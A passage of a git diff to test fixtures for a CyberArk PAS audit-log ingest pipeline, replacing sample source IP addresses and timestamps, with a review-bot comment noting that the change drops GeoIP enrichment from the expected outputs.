Audit\",\"Severity\":\"Info\",\"Issuer\":\"PasswordManager\",\"Action\":\"General Audit\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"Test\",\"File\":\"Root\\\\Operating System-WindowsDesktopLocalAccountsRotationalPolicy-10.0.1.20-x_accountB\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"Dual account rotation\",\"ExtraDetails\":\"DualAccountStatus=Active;Index=2;\",\"Message\":\"General 
Audit\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"WinDesktopLocal\"},{\"Name\":\"UserName\",\"Value\":\"x_accountB\"},{\"Name\":\"Address\",\"Value\":\"components\"},{\"Name\":\"SequenceID\",\"Value\":\"25\"},{\"Name\":\"CPMStatus\",\"Value\":\"success\"},{\"Name\":\"RetriesCount\",\"Value\":\"-1\"},{\"Name\":\"LastTask\",\"Value\":\"ChangeTask\"},{\"Name\":\"GroupName\",\"Value\":\"WindowsGroup\"},{\"Name\":\"LastSuccessChange\",\"Value\":\"1615419568\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"},{\"Name\":\"Index\",\"Value\":\"2\"},{\"Name\":\"DualAccountStatus\",\"Value\":\"Active\"},{\"Name\":\"VirtualUsername\",\"Value\":\"virtual\"}]}}}}", "code": "459", "kind": "event" diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-467-the-component-public-key-for-jwt-authentication-was-updated.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-467-the-component-public-key-for-jwt-authentication-was-updated.log-expected.json index 330b08c1cda..3f96e28a992 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-467-the-component-public-key-for-jwt-authentication-was-updated.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-467-the-component-public-key-for-jwt-authentication-was-updated.log-expected.json 
@@ -47,7 +47,7 @@ "event": { "severity": 2, "action": "the component public key for jwt authentication was updated", - "ingested": "2021-06-09T10:24:35.576057Z", + "ingested": "2021-12-09T13:37:05.706900Z", "original": "\u003c5\u003e1 2021-03-10T18:14:35Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 10:14:35\",\"IsoTimestamp\":\"2021-03-10T18:14:35Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"467\",\"Desc\":\"The component public key for JWT authentication was updated\",\"Severity\":\"Info\",\"Issuer\":\"PasswordManager\",\"Action\":\"The component public key for JWT authentication was updated\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"The component public key for JWT authentication was updated\",\"GatewayStation\":\"\"}}}", "code": "467", "kind": "event" diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-479-security-warning-the-signature-hash-algorithm-of-the-vault-certificate-is-sha1.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-479-security-warning-the-signature-hash-algorithm-of-the-vault-certificate-is-sha1.log-expected.json index bb9f579d866..f86608120b8 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-479-security-warning-the-signature-hash-algorithm-of-the-vault-certificate-is-sha1.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-479-security-warning-the-signature-hash-algorithm-of-the-vault-certificate-is-sha1.log-expected.json 
@@ -46,7 +46,7 @@ }, "event": { "severity": 7, - "ingested": "2021-06-09T10:24:35.596452500Z", + "ingested": "2021-12-09T13:37:05.810861Z", "original": "\u003c7\u003e1 2021-03-04T19:10:01Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 04 11:10:01\",\"IsoTimestamp\":\"2021-03-04T19:10:01Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"479\",\"Desc\":\"Security warning - The Signature Hash Algorithm of the Vault certificate is SHA1.\",\"Severity\":\"Error\",\"Issuer\":\"Builtin\",\"Action\":\"Security warning - The Signature Hash Algorithm of the Vault certificate is SHA1.\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"0.0.0.0\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Security warning - The Signature Hash Algorithm of the Vault certificate is SHA1.\",\"GatewayStation\":\"\"}}}", "code": "479", "kind": "event", 
@@ -90,7 +90,7 @@ }, "event": { "severity": 7, - "ingested": "2021-06-09T10:24:35.596463100Z", + "ingested": "2021-12-09T13:37:05.810869800Z", "original": "Mar 08 07:46:54 VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"no\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"479\",\"Desc\":\"Security warning - The Signature Hash Algorithm of the Vault certificate is SHA1.\",\"Severity\":\"Error\",\"Issuer\":\"Builtin\",\"Action\":\"Security warning - The Signature Hash Algorithm of the Vault certificate is SHA1.\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"0.0.0.0\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Security warning - The Signature Hash Algorithm of the Vault certificate is SHA1.\",\"GatewayStation\":\"\"}}}", "code": "479", "kind": "event", diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-482-update-existing-add-account-bulk-operation-succeeded.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-482-update-existing-add-account-bulk-operation-succeeded.log-expected.json index 2841a044b9f..53c760d0864 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-482-update-existing-add-account-bulk-operation-succeeded.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-482-update-existing-add-account-bulk-operation-succeeded.log-expected.json 
@@ -47,7 +47,7 @@ "event": { "severity": 2, "action": "update existing add account bulk operation succeeded", - "ingested": "2021-06-09T10:24:35.631517300Z", + "ingested": "2021-12-09T13:37:05.981143100Z", "original": "\u003c5\u003e1 2021-03-10T08:31:49Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 00:31:49\",\"IsoTimestamp\":\"2021-03-10T08:31:49Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"482\",\"Desc\":\"Update existing Add Account Bulk Operation succeeded\",\"Severity\":\"Info\",\"Issuer\":\"PVWAAppUser\",\"Action\":\"Update existing Add Account Bulk Operation succeeded\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Update existing Add Account Bulk Operation succeeded\",\"GatewayStation\":\"\"}}}", "code": "482", "kind": "event" diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-50-store-file.log b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-50-store-file.log index f3d9bd31a39..6b4bda22fbe 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-50-store-file.log +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-50-store-file.log 
@@ -1,6 +1,6 @@ <5>1 2021-03-08T18:24:50Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 08 10:24:50","IsoTimestamp":"2021-03-08T18:24:50Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"50","Desc":"Store File","Severity":"Info","Issuer":"PVWAAppUser","Action":"Store File","SourceUser":"","TargetUser":"","Safe":"PVWAPrivateUserPrefs","File":"Root\\YWRtaW5pc3RyYXRvcg==","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Store File","GatewayStation":""}}} -<5>1 2021-03-10T09:11:21Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:21","IsoTimestamp":"2021-03-10T09:11:21Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"50","Desc":"Store File","Severity":"Info","Issuer":"Administrator","Action":"Store File","SourceUser":"","TargetUser":"","Safe":"PSMPConf","File":"Root\\syntaxparser-conf.json.1.1","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Store File","GatewayStation":""}}} +<5>1 2021-03-10T09:11:21Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:21","IsoTimestamp":"2021-03-10T09:11:21Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"50","Desc":"Store File","Severity":"Info","Issuer":"Administrator","Action":"Store File","SourceUser":"","TargetUser":"","Safe":"PSMPConf","File":"Root\\syntaxparser-conf.json.1.1","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Store File","GatewayStation":""}}} <5>1 2021-03-10T18:36:22Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 
10:36:22","IsoTimestamp":"2021-03-10T18:36:22Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"50","Desc":"Store File","Severity":"Info","Issuer":"Administrator","Action":"Store File","SourceUser":"","TargetUser":"","Safe":"PVWAConfig","File":"Root\\PVConfiguration.xml","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Store File","GatewayStation":""}}} -<5>1 2021-03-10T22:17:56Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:17:56","IsoTimestamp":"2021-03-10T22:17:56Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"50","Desc":"Store File","Severity":"Info","Issuer":"Administrator","Action":"Store File","SourceUser":"","TargetUser":"","Safe":"PVWAConfig","File":"ROOT\\PVConfiguration.xml","Station":"35.192.121.42","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Store File","GatewayStation":""}}} -<5>1 2021-03-11T17:38:27Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:38:27\n 2021-03-11T17:38:27Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 50\n Store File\n Info\n PSMPApp_VAGRANT\n Store File\n \n \n PSMRecordings\n root\\87012dcc-8290-11eb-949e-080027efd402.SSH.txt\n 81.32.170.205\n \n \n \n \n \n Store File\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:38:27","IsoTimestamp":"2021-03-11T17:38:27Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"50","Desc":"Store File","Severity":"Info","Issuer":"PSMPApp_VAGRANT","Action":"Store File","SourceUser":"","TargetUser":"","Safe":"PSMRecordings","File":"root\\87012dcc-8290-11eb-949e-080027efd402.SSH.txt","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Store File","GatewayStation":""}}} +<5>1 2021-03-10T22:17:56Z VAULT 
{"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:17:56","IsoTimestamp":"2021-03-10T22:17:56Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"50","Desc":"Store File","Severity":"Info","Issuer":"Administrator","Action":"Store File","SourceUser":"","TargetUser":"","Safe":"PVWAConfig","File":"ROOT\\PVConfiguration.xml","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Store File","GatewayStation":""}}} +<5>1 2021-03-11T17:38:27Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:38:27\n 2021-03-11T17:38:27Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 50\n Store File\n Info\n PSMPApp_VAGRANT\n Store File\n \n \n PSMRecordings\n root\\87012dcc-8290-11eb-949e-080027efd402.SSH.txt\n 67.43.156.13\n \n \n \n \n \n Store File\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:38:27","IsoTimestamp":"2021-03-11T17:38:27Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"50","Desc":"Store File","Severity":"Info","Issuer":"PSMPApp_VAGRANT","Action":"Store File","SourceUser":"","TargetUser":"","Safe":"PSMRecordings","File":"root\\87012dcc-8290-11eb-949e-080027efd402.SSH.txt","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Store File","GatewayStation":""}}} <5>1 2021-03-11T19:45:26Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 11:45:26\n 2021-03-11T19:45:26Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 50\n Store File\n Info\n Administrator\n Store File\n \n \n PVWAConfig\n Root\\PVConfiguration.xml\n 127.0.0.1\n \n \n \n \n \n Store File\n 10.0.1.20\n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 
11:45:26","IsoTimestamp":"2021-03-11T19:45:26Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"50","Desc":"Store File","Severity":"Info","Issuer":"Administrator","Action":"Store File","SourceUser":"","TargetUser":"","Safe":"PVWAConfig","File":"Root\\PVConfiguration.xml","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Store File","GatewayStation":"10.0.1.20"}}} diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-50-store-file.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-50-store-file.log-expected.json index c2131001e3d..3b417a619cf 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-50-store-file.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-50-store-file.log-expected.json @@ -52,7 +52,7 @@ "event": { "severity": 2, "action": "store file", - "ingested": "2021-06-09T10:24:35.653794300Z", + "ingested": "2021-12-09T13:37:06.052356900Z", "original": "\u003c5\u003e1 2021-03-08T18:24:50Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 08 10:24:50\",\"IsoTimestamp\":\"2021-03-08T18:24:50Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"50\",\"Desc\":\"Store File\",\"Severity\":\"Info\",\"Issuer\":\"PVWAAppUser\",\"Action\":\"Store File\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PVWAPrivateUserPrefs\",\"File\":\"Root\\\\YWRtaW5pc3RyYXRvcg==\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Store File\",\"GatewayStation\":\"\"}}}", "code": "50", "kind": "event" 
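Review bot: Replacing 81.32.170.205 and 35.192.121.42 with 67.43.156.13 and 67.43.156.14 in this fixture leaves the regenerated expected output for the same records with no `source.geo` object at all (the `test-50-store-file.log-expected.json` hunks at `@@ -65`, `@@ -193` and `@@ -262` delete the whole block rather than update it), so this test no longer exercises the geoip enrichment it previously asserted. Presumably the GeoIP database used by the pipeline tests has no entry for that range; if that is the intent, it is worth keeping one record on an address the test database does resolve, or stating in the commit that geo coverage for this data stream is dropped on purpose. Moving committed samples off real routable addresses is otherwise sound: it avoids publishing third-party hosts in a public fixture and keeps the expected output stable across GeoIP database updates. The `station`, `related.ip` and embedded `raw` XML values were all updated consistently, so the field-mapping assertions still agree with each other.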
@@ -65,20 +65,8 @@
 }
 },
 "source": {
- "geo": {
- "continent_name": "Europe",
- "region_iso_code": "ES-B",
- "city_name": "Barcelona",
- "country_iso_code": "ES",
- "country_name": "Spain",
- "region_name": "Barcelona",
- "location": {
- "lon": 2.1611,
- "lat": 41.3891
- }
- },
- "address": "81.32.170.205",
- "ip": "81.32.170.205"
+ "address": "67.43.156.13",
+ "ip": "67.43.156.13"
 },
 "tags": [
 "preserve_original_event"
@@ -98,7 +86,7 @@
 },
 "related": {
 "ip": [
- "81.32.170.205"
+ "67.43.156.13"
 ]
 },
 "cyberarkpas": {
@@ -108,7 +96,7 @@
 "iso_timestamp": "2021-03-10T09:11:21Z",
 "file": "Root\\syntaxparser-conf.json.1.1",
 "safe": "PSMPConf",
- "station": "81.32.170.205",
+ "station": "67.43.156.13",
 "action": "Store File",
 "message": "Store File",
 "issuer": "Administrator",
@@ -122,8 +110,8 @@ "event": { "severity": 2, "action": "store file", - "ingested": "2021-06-09T10:24:35.653805600Z", - "original": "\u003c5\u003e1 2021-03-10T09:11:21Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:21\",\"IsoTimestamp\":\"2021-03-10T09:11:21Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"50\",\"Desc\":\"Store File\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Store File\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSMPConf\",\"File\":\"Root\\\\syntaxparser-conf.json.1.1\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Store File\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:37:06.052364800Z", + "original": "\u003c5\u003e1 2021-03-10T09:11:21Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:21\",\"IsoTimestamp\":\"2021-03-10T09:11:21Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"50\",\"Desc\":\"Store File\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Store File\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSMPConf\",\"File\":\"Root\\\\syntaxparser-conf.json.1.1\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Store File\",\"GatewayStation\":\"\"}}}", "code": "50", "kind": "event" } 
@@ -180,7 +168,7 @@
 "event": {
 "severity": 2,
 "action": "store file",
- "ingested": "2021-06-09T10:24:35.653820300Z",
+ "ingested": "2021-12-09T13:37:06.052371300Z",
 "original": "\u003c5\u003e1 2021-03-10T18:36:22Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 10:36:22\",\"IsoTimestamp\":\"2021-03-10T18:36:22Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"50\",\"Desc\":\"Store File\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Store File\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PVWAConfig\",\"File\":\"Root\\\\PVConfiguration.xml\",\"Station\":\"127.0.0.1\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Store File\",\"GatewayStation\":\"\"}}}",
 "code": "50",
 "kind": "event"
@@ -193,19 +181,8 @@
 }
 },
 "source": {
- "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-VA",
- "country_name": "United States",
- "region_name": "Virginia",
- "location": {
- "lon": -77.2481,
- "lat": 38.6583
- },
- "country_iso_code": "US"
- },
- "address": "35.192.121.42",
- "ip": "35.192.121.42"
+ "address": "67.43.156.14",
+ "ip": "67.43.156.14"
 },
 "tags": [
 "preserve_original_event"
@@ -225,7 +202,7 @@
 },
 "related": {
 "ip": [
- "35.192.121.42"
+ "67.43.156.14"
 ]
 },
 "cyberarkpas": {
@@ -235,7 +212,7 @@
 "iso_timestamp": "2021-03-10T22:17:56Z",
 "file": "ROOT\\PVConfiguration.xml",
 "safe": "PVWAConfig",
- "station": "35.192.121.42",
+ "station": "67.43.156.14",
 "action": "Store File",
 "message": "Store File",
 "issuer": "Administrator",
@@ -249,8 +226,8 @@ "event": { "severity": 2, "action": "store file", - "ingested": "2021-06-09T10:24:35.653824400Z", - "original": "\u003c5\u003e1 2021-03-10T22:17:56Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 14:17:56\",\"IsoTimestamp\":\"2021-03-10T22:17:56Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"50\",\"Desc\":\"Store File\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Store File\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PVWAConfig\",\"File\":\"ROOT\\\\PVConfiguration.xml\",\"Station\":\"35.192.121.42\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Store File\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:37:06.052377200Z", + "original": "\u003c5\u003e1 2021-03-10T22:17:56Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 14:17:56\",\"IsoTimestamp\":\"2021-03-10T22:17:56Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"50\",\"Desc\":\"Store File\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Store File\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PVWAConfig\",\"File\":\"ROOT\\\\PVConfiguration.xml\",\"Station\":\"67.43.156.14\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Store File\",\"GatewayStation\":\"\"}}}", "code": "50", "kind": "event" } 
@@ -262,20 +239,8 @@
 }
 },
 "source": {
- "geo": {
- "continent_name": "Europe",
- "region_iso_code": "ES-B",
- "city_name": "Barcelona",
- "country_iso_code": "ES",
- "country_name": "Spain",
- "region_name": "Barcelona",
- "location": {
- "lon": 2.1611,
- "lat": 41.3891
- }
- },
- "address": "81.32.170.205",
- "ip": "81.32.170.205"
+ "address": "67.43.156.13",
+ "ip": "67.43.156.13"
 },
 "tags": [
 "preserve_original_event"
@@ -295,7 +260,7 @@
 },
 "related": {
 "ip": [
- "81.32.170.205"
+ "67.43.156.13"
 ]
 },
 "cyberarkpas": {
@@ -305,8 +270,8 @@ "iso_timestamp": "2021-03-11T17:38:27Z", "file": "root\\87012dcc-8290-11eb-949e-080027efd402.SSH.txt", "safe": "PSMRecordings", - "station": "81.32.170.205", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 11 09:38:27\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-11T17:38:27Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e50\u003c/MessageID\u003e\n \u003cDesc\u003eStore File\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003ePSMPApp_VAGRANT\u003c/Issuer\u003e\n \u003cAction\u003eStore File\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003ePSMRecordings\u003c/Safe\u003e\n \u003cFile\u003eroot\\87012dcc-8290-11eb-949e-080027efd402.SSH.txt\u003c/File\u003e\n \u003cStation\u003e81.32.170.205\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eStore File\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "station": "67.43.156.13", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 11 09:38:27\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-11T17:38:27Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n 
\u003cMessageID\u003e50\u003c/MessageID\u003e\n \u003cDesc\u003eStore File\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003ePSMPApp_VAGRANT\u003c/Issuer\u003e\n \u003cAction\u003eStore File\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003ePSMRecordings\u003c/Safe\u003e\n \u003cFile\u003eroot\\87012dcc-8290-11eb-949e-080027efd402.SSH.txt\u003c/File\u003e\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eStore File\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "action": "Store File", "message": "Store File", "issuer": "PSMPApp_VAGRANT", 
@@ -320,8 +285,8 @@ "event": { "severity": 2, "action": "store file", - "ingested": "2021-06-09T10:24:35.653827400Z", - "original": "\u003c5\u003e1 2021-03-11T17:38:27Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 09:38:27\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T17:38:27Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e50\u003c/MessageID\u003e\\n \u003cDesc\u003eStore File\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003ePSMPApp_VAGRANT\u003c/Issuer\u003e\\n \u003cAction\u003eStore File\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSMRecordings\u003c/Safe\u003e\\n 